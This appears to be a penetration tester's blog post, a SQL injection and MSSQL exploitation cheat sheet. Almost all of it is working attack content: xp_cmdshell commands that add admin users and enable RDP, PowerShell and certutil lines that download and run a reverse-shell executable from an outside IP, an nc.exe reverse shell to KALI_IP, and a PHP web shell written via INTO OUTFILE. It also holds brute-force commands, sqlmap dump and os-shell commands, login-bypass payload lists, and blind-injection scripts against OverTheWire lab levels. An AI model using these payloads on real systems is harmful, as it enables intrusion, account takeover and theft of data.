SQL Injection Cheat sheet


Hello Everyone, below you can find the cheat sheet for sql injection, its more like sql injection techniques that I frequently use and it can give you a basic understanding of how sql injection can be performed.




THIS IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE ONLY, AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS


SQLServer Abuse with nmap

nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS

nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add"

nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net localgroup administrators bhanu /add" 
SQSH usage:

sqsh -S IP_Address:PORT -u username -p password
EXEC xp_cmdshell 'net users /add bhanu bhanu123'

\go

EXEC xp_cmdshell 'net localgroup administrators bhanu /add'

\go
MssqlClient 

Exploiting From Windows with Explanation - Nikhil Mittal

#Enumeration using Metasploit
auxiliary(admin/mssql/mssql_enum)

mssqlclient.py username@10.10.10.10

#Run arbitary commands
xp_cmdshell whoami

#View Version
SELECT @@version

#List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME();


#List Users

SELECT name FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';

#Current User
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
#list all stored proceuderes SELECT * FROM sys.procedures SELECT * FROM [master].INFORMATION_SCHEMA.ROUTINES WHERE ROUTINE_TYPE = 'PROCEDURE' AND LEFT(ROUTINE_NAME, 3) NOT IN ('sp_', 'xp_', 'ms_') SELECT NAME FROM [MASTER].INFORMATION_SCHEMA.ROUTINES WHERE ROUTINE_TYPE = ''PROCEDURE'' #stored procedures and assembly modules select * from [hostname\DB_NAME].Table_Name.sys.assembly_modules

#Enum Privs

SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

#Show Servername
select @@servername

#Show linked servers
select * from sysservers;   
select name from sysservers;

#Enum Linked Remote Servers
EXECUTE ('select @@servername;') at [hostname\DB_NAME];
EXECUTE ('select suser_name();') at
[hostname\DB_NAME];
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [hostname\DB_NAME];
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [hostname\DB_NAME];
#Find Stored Procedures on a linked server EXECUTE(' SELECT * FROM [MASTER].INFORMATION_SCHEMA.ROUTINES WHERE ROUTINE_TYPE = ''PROCEDURE''') at [hostname\DB_NAME]; EXECUTE(' SELECT NAME FROM [MASTER].INFORMATION_SCHEMA.ROUTINES WHERE ROUTINE_TYPE = ''PROCEDURE''') at [hostname\DB_NAME]; #Find if CRL is enabled on the server, if the output shows CRL enabled, its explotable select * from [hostname\DB_NAME].clients.sys.configurations where name like '%clr%enabled' #Find the username from which we can run commands on the server
EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];

#Check sysadmin accounts on the server/DB

EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];

#Check your permissions on the server
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [COMPATIBILITY\POO_CONFIG];

#Running command as a linked server using the server that we have permissions on

EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

#View the permissions you have on the linked database.

EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

#Creating a new sa user
#so that we can work easily on the DB that we have permissions on, rather than running as other user multile times
EXECUTE('EXECUTE(''CREATE LOGIN newuser WITH PASSWORD = ''''P@$$w0rd123'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''newuser'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]

#Login as a new user mssqlclient.py newuser@10.10.10.10
P@$$w0rd123

#List Databases
SELECT name FROM master..sysdatabases;

#List Objects from a selected database
to QUERY in MSSQL - [server].[db].[schema].[table]

select table_name,table_schema from DB_NAME.INFORMATION_SCHEMA.TABLES;

#Exploiting a Stored Procedure - sp_execute_external_script
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';

#Abusing Xpdirtree

Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local SQLCMD -S SERVER\Username -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin
Enum Linked SQL Servers 

#Show linked servers
select * from sysservers;   
select name from sysservers;

#Enum Linked Remote Servers
EXECUTE ('select @@servername;') at [hostname\DB_NAME];
EXECUTE ('select suser_name();') at [hostname\DB_NAME];
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [hostname\DB_NAME];
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [hostname\DB_NAME];

#Find the username from which we can run commands on the server 
EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];


when Execute doesnt work try openquery as below 

#List Databases in [hostname\DB_NAME]
select * from openquery([hostname\DB_NAME],'select * from sys.databases')
#List Tables in clients db select * from openquery([hostname\DB_NAME],'select * from [DB_NAME].sys.tables')
#Fetch table data select * from openquery([hostname\DB_NAME],'select * from [DB_NAME].dbo.COL_NAME') #find a string in a column
select * from openquery([hostname\DB_NAME],'select * from [DB_NAME].dbo.COL_NAME') where name like '%noob%'
Enum from Windows 

#If xp_cmdshell is disabled:
Get-SQLQuery -query "EXECUTE(sp_configure 'show advanced options',1;reconfigure;)" -Verbose
Get-SQLQuery -Query "EXECUTE( sp_configure 'xp_cmdshell', 1; RECONFIGURE;)" -Verbose
SQLCMD -S hostname\SQLSer -Q "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;" -U Admin -P Admin

#cmd Execution
Get-SQLQuery -Query "EXECUTE(xp_cmdshell 'whoami')"
SQLCMD -Q "EXEC xp_cmdshell 'whoami'"

#Enable xp_cmdshell on a linked server and execute commands
Get-SQLQuery -query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "server02.steins.local"'"
Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell ''''whoami'''''') AT "server02.steins.local"'

#Get Reverse Shell on a Linked Server
Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell ''''dir c:\temp'''''') AT "server.steins.local"'

Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell "cmd /c powershell.exe  Import-Module Microsoft.PowerShell.Utility;Invoke-WebRequest http://10.10.10.10/mal.exe -OutFile c:\temp\mal.exe"'') AT "server.steins.local"'
Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell "cmd /c powershell.exe Invoke-WebRequest http://10.10.10.10/mal.exe -OutFile c:\temp\mal.exe"'') AT "server.steins.local"'

#mal.exe is C# reverse shell
Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell "cmd /c  c:\temp\mal.exe"'') AT "server.steins.local"'

nc -nvlp 8080
PowerUPSQL Commands

#Find the SQL Instances using PowerUpSQL based on the SPN 
Get-SQLInstanceDomain

#Get Local DB Info
Get-SQLInstanceLocal

#Find a machine that is acecssible Get-SQLInstanceLocal
Get-SQLInstanceDomain |  Get-SQLInstanceTestThreaded | Format-List

#Dump all the DB Info into csv files, get the instance name from 
Invoke-SQLDumpInfo -Verbose -Instance "Hostname\SQLInstance"

#Start SQLAudit - lists out all vulnerabilities 
Invoke-SQLAudit -Verbose -Instance "Hostname\SQLInstance"

#Start Piv Esc on the server  
Invoke-SQLEscalatePriv –Verbose –Instance "Hostname\SQLInstance"

#List Linked Servers
Get-SQLServerLinkCrawl -Instance Hostname\SQLInstance

#Scan sql servers using UDP
Get-SQLInstanceScanUDP

#get the list of comuter names 
comps = (Get-SQLInstanceDomain).Computername 
 
 
#Check if the current domain user has access to a database:
Get-SQLInstanceDomain | GetSQLConnectionTestThreaded -Verbose

#View the info the SQL Server
Get-SQLInstanceDomain | Get-SQLServerInfo

#get the databases and the users info  
Get-SQLFuzzServerLogin -Instance Sql_Serve1  –Verbose

#automated DB link crawling.
Get-SQLServerLinkCrawl -Instance SQL_Server1
Bruteforcing SQL Server

Invoke-BruteForce from Nishang

$comps | Invoke-BruteForce -UserList users.txt -PasswordList passwords.txt -Service SQL -Verbose

or 
Invoke-BruteForce -ComputerName Sql_Server1  -UserList users.txt -PasswordList passwords.txt -Service SQL -Verbose

#bruteforcing using PowerUPSQL
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -
Username sa -Password Password -Verbose


#Login into the database as a logged in user 
runas /noprofile /netonly /user:<domain\username> powershell.exe
SQL Server - Privilege Escalation 

Version - SELECT @@version
Current User - SELECT SUSER_SNAME(), SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin') Current Role – SELECT user
Current database - SELECT db_name()
List all databases - SELECT name FROM master..sysdatabases

#All logins on server 
SELECT * FROM sys.server_principals WHERE type_desc != 'SERVER_ROLE'


#All database users for a database
SELECT * FROM sys.database_principals WHERE type_desc != 'DATABASE_ROLE'


#List all sysadmin (More info with high priv user)
SELECT name,type_desc,is_disabled FROM 
sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1

#List all database roles 
use accessdb	//run below query in non-default database. ex: not master datbase 
SELECT DP1.name AS DatabaseRoleName,   isnull (DP2.name, 'No members') AS DatabaseUserName
FROM sys.database_role_members AS DRM  
RIGHT OUTER JOIN sys.database_principals AS DP1  ON DRM.role_principal_id = DP1.principal_id  
LEFT OUTER JOIN sys.database_principals AS DP2  
ON DRM.member_principal_id = DP2.principal_id  
WHERE DP1.type = 'R'
ORDER BY DP1.name; 

Effective Permissions for the server - SELECT * FROM fn_my_permissions(NULL, 'SERVER');
Effective Permissions for the database - SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
Active user token – SELECT * FROM sys.user_token
Active login token - SELECT * FROM sys.login_token
ERROR BASED SQL Injection:
============================
website.com/comment.php?id=1'   /Breaks the statement
website.com/comment.php?id=738 order by 1 /Order by first column with reference to select query
website.com/comment.php?id=738 order by 7 /increase the column count, until we get an error
      /This statement broke at 7, so only 6 columns
website.com/comment.php?id=738 union select 1,2,3,4,5,6
  /union all is used to combine 2 or more select statements
  /Where ever output is displayed - it is suitable to enumerate, here 5

website.com/comment.php?id=738 union select 1,2,3,4,@@version,6  /mysql version command

website.com/comment.php?id=738 union select 1,2,3,4,user(),6  /Current user

website.com/comment.php?id=738 union select 1,2,3,4,table_name,6 FROM information_schema.tables
     /Prints all of the table names in the database

website.com/comment.php?id=738 union select 1,2,3,4,column_name,6 FROM information_schema where table_name='users'
     /Extract column names from Table - Ue

website.com/comment.php?id=738 union select 1,2,name,4,password,6 FROM users



ERROR BASED SQL Injection: SQLLITE
==================================

http://localhost:3000/rest/products/search?q=')) union select 1,sqlite_version(),3,4,5,6,7,8,9--;

http://localhost:3000/rest/products/search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,9 FROM sqlite_master--;

search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,tbl_name FROM sqlite_master--;           # Get all table names in sqlite_master db

search?q=sadsa')) union select 1,sqlite_version(),3,4,5,6,7,email,password FROM Users--;                 #Get usernames and passwords            


Error Based SQL Injection using SQLMAP

sqlmap -u "http://website.com/index.php?debug" --string="This user exists" --auth-type=Basic --auth-cred=username:password --data "username=user2" --level=5 --risk=3
Automating Blind SQL Injection Example:

import requests
from requests.auth import HTTPBasicAuth

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
filtered = ''
passwd = ''

for char in chars:
    Data = {'username' : 'natas16" and password LIKE BINARY "%' + char + '%" #'}
    r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)
    if 'exists' in r.text :
        filtered = filtered + char

for i in range(0,32):
    for char in filtered:
        Data = {'username' : 'natas16" and password LIKE BINARY "' + passwd + char + '%" #'}
        r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)
        if 'exists' in r.text :
            passwd = passwd + char
            print(passwd)
            break
Code by Abatchy's blog SQL Injection sample code import requests url='http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/index.php' passchar='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXVZ1234567890' bstr='This user exist'.encode('utf-8') password='' for i in range(32): for j in passchar: req = requests.get(url+'?username=natas16" AND password LIKE BINARY "' + password + j + '%" "') if req.content.find(bstr) != -1: password += j print('Password: ' + password) break
Code by AnonHack.in
TIME BASED SQL INJECTION:
--------------------------
In Time  Based SQL injection - if the query is true - it will wait for the sleep time or else 
executed immediately.

website.com/comment.php?id=738-sleep(5)  /5 Seconds to load
website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0)
    /Executes after 5 seconds -Because the statement is true

website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0) 
    /Executes Immediately - Statement is false


website.com/comment.php?id=738 union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
    /Loading a file from the server

website.com/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec(#_GET['cmd']);?>",6 into OUTFILE 'C:/xampp/htdocs/backdoor.php'

website.com/backdoor.php/cmd?ipconfig
Automating Time-Based SQL Injection Example: 
import requests from requests.auth import HTTPBasicAuth Auth=HTTPBasicAuth('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw') headers = {'content-type': 'application/x-www-form-urlencoded'} filteredchars = '' passwd = '' allchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890' # SELECT * from users where username="_natas18" and password like binary '%a%' and sleep(5) # #password for natas18 does contain the letter ‘a’ and sleep(5) was executed. if the pass has letter 'a' it takes 5 secs to load for char in allchars: payload = 'username=natas18%22+and+password+like+binary+%27%25{0}%25%27+and+sleep%281%29+%23'.format(char) r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers) if(r.elapsed.seconds >= 1): filteredchars = filteredchars + char print(filteredchars) print(filteredchars) for i in range(0,32): for char in filteredchars: payload = 'username=natas18%22%20and%20password%20like%20binary%20\'{0}%25\'%20and%20sleep(1)%23'.format(passwd + char) r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers) if(r.elapsed.seconds >= 1): passwd = passwd + char print(passwd) break Code written by Abatchy's blog
SQL Command Injection: MSSQL

bhanu';EXEC Master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\omg.txt';--

admin';EXEC xp_cmdshell 'certutil -urlcache -f http://IP_Address/shell.asp';--

admin';EXEC Master.dbo.xp_cmdshell 'c:\share\nc.exe KALI_IP 9002 -e cmd.exe

sqsh -S IP_ADDRESS:27900 -U sa -L user=sa -L password=password


If xp_cmdshell is disabled:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;



Creating an Admin Account with RDP Access:

aaa';EXEC Master.dbo.xp_cmdshell 'net user /add bhanu bhanu123';--

aaa';EXEC Master.dbo.xp_cmdshell 'net localgroup administrators bhanu /add';--

aaa';EXEC Master.dbo.xp_cmdshell 'reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0';--

aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remoteadmin enable';--

aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remotedesktop enable';--

aaa';EXEC Master.dbo.xp_cmdshell 'mstsc /console /v:IP_Address';---

NSE Script for XP_CMDSHELL

Bypassing Restriction Interfaces:
----------------------------------
Use Tamper Data Firefox plugin.  /Intercetps Posts requests

start tampter data --> input something inoto input field. or change the items in 
drop down.
SQLMAP:
---------
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --dump --threads=5
     /Dump All DB data

sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --os-shell

sqlmap --help

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"



List all the databases:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --dbs



Current User:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --current-user



Current DB:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --current-db



Tables:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --tables -D owasp10



Columns:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --columns -T accounts -D owasp10



Dump:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 -T accounts -D owasp10 --dump



OS Shell:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --os-shell



SQL Shell:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --sql-shell 

current_user()

user()

database()

select tablename from information_schema.table where table_schema = 'owasp10'

 
Methodology 

1) Check for login pages - try all special characters

2) f12 --> run the page; check for any search functionality like search?q= or id=1?; something like that


 

Cheatsheet

admin' or 1=1; --
admin' OR 1=1 -- -
search?q='))--;
' or '1'='1
' or 1=1;--
' or 1=1;#
') or ('x'='x
' or like '%';--
' or 1=1 LIMIT 1;--

USERNAME: ' or 1/*
PASSWORD: */ =1 --

USERNAME: admin' or 'a'='a
PASSWORD '#

If the database is mysql, try to dump all login info to files?

Mysql '*'
'&'
'^'
'-'
' or true;--
' or 1;--

union all select "",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055



Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment